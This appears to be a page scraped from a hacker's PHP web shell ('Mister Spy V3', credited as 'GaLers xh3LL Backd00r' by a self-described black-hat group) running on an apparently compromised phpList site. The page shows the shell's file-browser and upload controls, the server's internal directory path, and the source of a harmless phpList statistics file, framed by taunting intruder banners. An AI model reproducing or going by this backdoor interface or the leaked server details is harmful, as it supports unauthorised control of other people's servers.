Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/phplist/lists/admin/
Upload File :
Current File : /home/caballoscriollos/public_html/phplist/lists/admin/statsmgt.php

<?php
require_once dirname(__FILE__).'/accesscheck.php';

print '<ul class="dashboard_button">';

print "<li class='statistics'>".PageLink2("statsoverview",$GLOBALS['I18N']->get('Overview'))."</li>";
print "<li class='statistics'>".PageLink2("uclicks",$GLOBALS['I18N']->get('View Clicks by URL'))."</li>";
print "<li class='statistics'>".PageLink2("mclicks",$GLOBALS['I18N']->get('View Clicks by Message'))."</li>";
print "<li class='statistics'>".PageLink2("mviews",$GLOBALS['I18N']->get('View Opens by Message'))."</li>";
print "<li class='statistics'>".PageLink2("domainstats",$GLOBALS['I18N']->get('Domain Statistics'))."</li>";
print '</ul>';
$num = Sql_Fetch_Row_Query(sprintf('select count(*) from %s',$GLOBALS['tables']['linktrack']));
if ($num[0] > 0) {
  print '<p class="information">'.$GLOBALS['I18N']->get('The clicktracking system has changed').'</p>';
  printf($GLOBALS['I18N']->get('You have %s entries in the old statistics table'),$num[0]);
  print "<div class='clear'></div><div class='button'>".PageLink2("convertstats",$GLOBALS['I18N']->get('Convert Old data to new'))."</div>";
  print '<p class="information">'.$GLOBALS['I18N']->get('To avoid overloading the system, this will convert 10000 records at a time').'</p>';
}


?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat